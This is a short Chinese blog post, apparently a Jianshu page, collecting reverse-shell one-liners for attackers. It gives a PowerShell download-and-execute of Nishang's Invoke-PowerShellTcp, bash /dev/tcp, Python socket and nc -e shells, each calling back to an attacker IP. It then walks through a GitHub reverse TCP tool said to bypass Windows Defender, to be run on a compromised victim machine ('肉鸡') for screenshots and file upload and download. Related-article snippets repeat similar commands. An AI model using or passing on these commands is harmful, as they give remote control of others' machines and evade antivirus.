美文网首页
反弹shell的多种姿势

反弹shell的多种姿势

作者: q1ya | 来源:发表于2020-01-13 14:24 被阅读0次
一、常用反弹命令

1、powershell反弹(win7测试可以)
powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress xxx.xxx.xxx.xxx -port 8888
2、 bash反弹(linux)
bash -i >& /dev/tcp/555.666.777.888/4444 0>&1
3、python反弹
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.1.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
4、nc反弹
nc 172.16.1.130 4444 -t -e /bin/bash

二、powershell ReverseTCPShell反弹shell

1、该脚本可以bypass windows defender(2019年12月24日)
2、安装
https://github.com/ZHacker13/ReverseTCPShell
3、执行
直接执行ps1脚本可能会失败,使用bypass安全策略执行
powershell.exe -ExecutionPolicy Bypass -File .\ReverseTCP.ps1
4、生成两种命令,一种在cmd执行,一种在ps执行
5、copy命令到肉鸡上执行,反弹成功

image
6、常用命令
screenshot 截屏
dir
upload
download

相关文章

  • 反弹shell的多种姿势

    一、常用反弹命令 1、powershell反弹(win7测试可以)powershell.exe IEX (New-...

  • 反弹shell姿势全集

    在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深...

  • 【安全记录】反弹shell小记

    前言 本文记录反弹shell的一些注意事项,主要包括:常用反弹shell的payload,获得tty-shell,...

  • nc自启动

    例如开机自启cmd 自启nc反弹shell(一) 自启nc反弹shell(二)

  • kail工具介绍

    反弹Shell https://www.cnblogs.com/cocowool/p/reverse-shell....

  • 反弹shell

    Reverse Shell bash反弹服务端: bash -c 'sh -i &>/dev/tcp/210.28...

  • 反弹shell

    bash -i 操作 攻击机 192.168.188.140执行 nc -lvvp 8888监听本地8888端口 ...

  • Shell反弹

    背景 前段时间因为使用Flink默认配置,没有禁用通过web上传jar包提交作业的功能,同时服务器配有公网地址,也...

  • 反弹shell

    0X01 什么是反弹shell reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到...

  • 反弹Shell

    实验环境 CentOS 6.5:192.168.0.3 kali2.0:192.168.0.4 方法1: 反弹sh...

网友评论

      本文标题:反弹shell的多种姿势

      本文链接:https://www.haomeiwen.com/subject/dfbgactx.html